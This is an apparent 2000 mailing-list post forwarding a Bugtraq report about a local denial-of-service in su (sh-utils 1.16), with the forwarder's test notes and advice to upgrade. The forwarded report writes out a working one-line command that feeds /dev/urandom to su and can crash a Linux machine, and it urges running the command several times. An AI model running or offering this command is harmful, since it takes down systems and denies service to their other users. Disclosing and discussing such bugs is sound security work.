security probs with su (sh-utils 1.16)
Has anyone else seen this? I tested it with the latest shellutils
from the frozen dist, and it appears to work. It should also be noted
that I tested this on my alpha box (running RedHat 6.1) and it didn't do
anything except give an error message. The version included with RedHat
6.1 is sh-utils 2.0. I haven't looked yet, but I'm willing to bet that
this was already noticed and fixed and people (including distro
maintainers) just need to upgrade.
----- Forwarded message from Javor Ninov <javor@multigroup-bg.com> -----
Date: Fri, 24 Mar 2000 18:42:03 +0200
Reply-To: Javor Ninov <javor@multigroup-bg.com>
From: Javor Ninov <javor@multigroup-bg.com>
Subject: Local Linux Crash
To: BUGTRAQ@SECURITYFOCUS.COM
Tested on SlackWare 7.0 2.2.14
After a short time this will crash a Linux box:
su `cat /dev/urandom` > /dev/null |< su `cat /dev/urandom`&
For a better effect start it several times :-))
This can be done by any regular user!
----- End forwarded message -----
Nathan Paul Simons
http://www.nmt.edu/~npsimons/